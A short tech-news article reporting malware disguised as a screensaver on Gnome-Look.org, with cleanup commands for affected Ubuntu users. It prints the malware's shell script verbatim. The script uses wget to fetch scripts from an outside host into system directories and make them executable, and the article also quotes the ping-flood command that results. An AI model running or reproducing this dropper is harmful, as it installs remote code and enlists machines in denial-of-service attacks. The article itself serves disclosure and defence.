Ubuntu: Malware in Screensaver from Gnome-Look.org
A desktop screensaver available from Gnome-Look.org was reported to be a malware, which downloads an unauthorized script. This script is believed to enable a possible DDoS attack. The screensaver has been immediately removed from the website after the malware was confirmed at this thread at Ubuntu forums.
The malware posing as a screensaver has a script:
#!/bin/sh cd /usr/bin/ rm Auto.bash sleep 1 wget http://05748.t35.com/Bots/Auto.bash chmod 777 Auto.bash echo ----------------- cd /etc/profile.d/ rm gnome.sh sleep 1 wget http://05748.t35.com/Bots/gnome.sh chmod 777 gnome.sh echo ----------------- clear exit
The ultimate result of this command is:
ping -s 65507 www.mmowned.com
This seems harmless. Also, the site in question [ www.mmowned.com ] advertises protection against DOS attacks. This can be a good prank revenge on the company or, this can be a part of something big by making all these affected computers into bots.
If you have already installed the screensaver, remove it and protect your computer by issuing the commands:
sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash
and
sudo dpkg -r app5552
[ Via OMG! UBUNTU! ]
Related Topics Similar to This Article: »
Recent Activity: »
Author: Chinmoy Kanjilal
Chinmoy Kanjilal is a FOSS enthusiast and evangelist. He is passionate about Android. Security exploits turn him on and he loves to tinker with computer networks. He rants occasionally at Techarraz.com. You can connect with him on Twitter @ckandroid.Chinmoy Kanjilal has written 953 articles for us.
The author of this post can be contacted at chinmoy@techie-buzz.com
We moderate comments to prevent spam. Moderation is done within few hours. Please try and stay on topic and refrain from using abusive language. If you think there is a problem with this post, please email the post author or send us an email at tips@techie-buzz.com with the URL and the problem you see and we will rectify it as soon as we can.